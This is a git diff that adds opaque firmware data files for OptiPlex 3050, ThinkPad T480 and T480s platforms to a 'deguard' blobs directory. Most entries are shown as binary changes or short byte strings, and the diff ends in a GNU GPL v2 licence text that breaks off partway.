b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/plat_n_sku new file mode 100644 index 00000000..96296af2 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/plat_n_sku @@ -0,0 +1 @@ +/€ \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/mbp b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/mbp new file mode 100644 index 00000000..6d3c0ed7 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/mbp differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/gpio/csme_pins b/blobs/t480/deguard/data/delta/optiplex_3050/home/gpio/csme_pins new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/dynregs b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/dynregs new file mode 100644 index 00000000..23c1ea27 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/dynregs differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/header b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/header new file mode 100644 index 00000000..4b755560 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/header differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/namestr b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/namestr new file mode 100644 index 00000000..6f8c6989 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/namestr differ diff --git 
a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof0 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof0 new file mode 100644 index 00000000..dab085a9 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof0 differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof1 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof1 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof10 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof10 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof2 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof2 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof3 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof3 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof4 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof4 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof5 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof5 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof6 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof6 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof7 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof7 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof8 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof8 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof9 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof9 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/eom b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/eom new file mode 100644 index 00000000..6b2aaa76 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/eom @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/ish_policy b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/ish_policy new file mode 100644 index 00000000..f76dd238 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/ish_policy differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/mctp/device_ports b/blobs/t480/deguard/data/delta/optiplex_3050/home/mctp/device_ports new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/mctp/device_ports differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/cfgmgr/cfg_rules b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/cfgmgr/cfg_rules new file mode 100644 index 00000000..91423d69 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/cfgmgr/cfg_rules differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid1 b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid1 new file mode 100644 index 00000000..189a0a7f --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid1 @@ -0,0 
+1 @@ +´n$Ï \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid2 b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid2 new file mode 100644 index 00000000..9aab9a80 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid2 @@ -0,0 +1 @@ +¿ãt` \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid3 b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid3 new file mode 100644 index 00000000..6eb8dc47 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/hci/sysintid3 @@ -0,0 +1 @@ +È®ï \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/pwdmgr/segreto b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/pwdmgr/segreto new file mode 100644 index 00000000..27f4db07 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/policy/pwdmgr/segreto @@ -0,0 +1 @@ +÷Þк \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/emu_fuse_map b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/emu_fuse_map new file mode 100644 index 00000000..e51cb421 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/emu_fuse_map differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/fuse_ip_base b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/fuse_ip_base new file mode 100644 index 00000000..756890b6 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/fuse_ip_base differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/plat_n_sku b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/plat_n_sku new file mode 100644 index 00000000..3b549bfe Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/bup_sku/plat_n_sku differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/invokemebx b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/invokemebx new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/invokemebx differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/mbp b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/mbp new file mode 100644 index 00000000..dd19cff4 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/bup/mbp differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/gpio/csme_pins b/blobs/t480/deguard/data/delta/thinkpad_t480/home/gpio/csme_pins new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/dynregs b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/dynregs new file mode 100644 index 00000000..1cbeceeb Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/dynregs differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/header b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/header new file mode 100644 index 00000000..4b755560 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/header differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/namestr b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/namestr new file mode 100644 index 00000000..b0f3735c Binary files /dev/null and 
b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/namestr differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof1 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof1 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof10 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof10 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof2 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof2 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof3 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof3 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof4 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof4 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof5 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof5 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof6 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof6 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof7 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof7 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof8 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof8 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof9 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/icc/prof9 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/eom b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/eom new file mode 100644 index 00000000..6b2aaa76 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/eom @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/ish_policy b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/ish_policy new file mode 100644 index 00000000..f76dd238 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mca/ish_policy differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/mctp/device_ports b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mctp/device_ports new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/mctp/device_ports differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/Bist/auto_config b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/Bist/auto_config new file mode 100644 index 00000000..009d73a3 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/Bist/auto_config differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/cfgmgr/cfg_rules b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/cfgmgr/cfg_rules new file mode 100644 index 00000000..c1e1e17a Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/cfgmgr/cfg_rules differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid1 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid1 new file mode 100644 
index 00000000..b9954bdf --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid1 @@ -0,0 +1,2 @@ +i@ +½ \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid2 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid2 new file mode 100644 index 00000000..77426ae8 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid2 @@ -0,0 +1 @@ +;K8” \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid3 b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid3 new file mode 100644 index 00000000..98bfdd47 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/hci/sysintid3 @@ -0,0 +1 @@ +ÖR \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/pwdmgr/segreto b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/pwdmgr/segreto new file mode 100644 index 00000000..b70c99ac --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480/home/policy/pwdmgr/segreto @@ -0,0 +1 @@ +&¢i¾ì \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/bup_sku/plat_n_sku b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/bup_sku/plat_n_sku new file mode 100644 index 00000000..d0514be7 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/bup_sku/plat_n_sku differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/mbp b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/mbp new file mode 100644 index 00000000..f5f419c1 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/bup/mbp differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/gpio/csme_pins b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/gpio/csme_pins new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/dynregs b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/dynregs new file mode 100644 index 00000000..912ab357 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/dynregs differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/header b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/header new file mode 100644 index 00000000..4b755560 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/header differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/namestr b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/namestr new file mode 100644 index 00000000..b0f3735c Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/namestr differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof1 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof1 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof10 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof10 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof2 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof2 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof3 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof3 new file mode 100644 index 00000000..e69de29b diff --git 
a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof4 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof4 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof5 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof5 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof6 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof6 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof7 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof7 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof8 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof8 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof9 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/icc/prof9 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/eom b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/eom new file mode 100644 index 00000000..6b2aaa76 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/eom @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/ish_policy b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/ish_policy new file mode 100644 index 00000000..f76dd238 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mca/ish_policy differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mctp/device_ports b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mctp/device_ports new file mode 100644 index 00000000..593f4708 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/mctp/device_ports differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/Bist/auto_config b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/Bist/auto_config new file mode 100644 index 00000000..f66c9cf4 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/Bist/auto_config differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/cfgmgr/cfg_rules b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/cfgmgr/cfg_rules new file mode 100644 index 00000000..6243fe92 Binary files /dev/null and b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/cfgmgr/cfg_rules differ diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid1 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid1 new file mode 100644 index 00000000..b508e576 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid1 @@ -0,0 +1 @@ +Zâ# \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid2 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid2 new file mode 100644 index 00000000..96116535 --- /dev/null +++ b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid2 @@ -0,0 +1 @@ +²R˦ \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid3 b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid3 new file mode 100644 index 00000000..7f55b1e9 --- /dev/null +++ 
b/blobs/t480/deguard/data/delta/thinkpad_t480s/home/policy/hci/sysintid3 @@ -0,0 +1 @@ +Œ¼6 \ No newline at end of file diff --git a/blobs/t480/deguard/data/fpfs/optiplex_3050 b/blobs/t480/deguard/data/fpfs/optiplex_3050 new file mode 100644 index 00000000..c3493e18 Binary files /dev/null and b/blobs/t480/deguard/data/fpfs/optiplex_3050 differ diff --git a/blobs/t480/deguard/data/fpfs/thinkpad_t480 b/blobs/t480/deguard/data/fpfs/thinkpad_t480 new file mode 100644 index 00000000..65fc3e7a Binary files /dev/null and b/blobs/t480/deguard/data/fpfs/thinkpad_t480 differ diff --git a/blobs/t480/deguard/data/fpfs/zero b/blobs/t480/deguard/data/fpfs/zero new file mode 100644 index 00000000..65f57c2e Binary files /dev/null and b/blobs/t480/deguard/data/fpfs/zero differ diff --git a/blobs/t480/deguard/doc/COPYING.txt b/blobs/t480/deguard/doc/COPYING.txt new file mode 100644 index 00000000..d159169d --- /dev/null +++ b/blobs/t480/deguard/doc/COPYING.txt @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. 
We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. 
If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. 
+However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. 
Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK 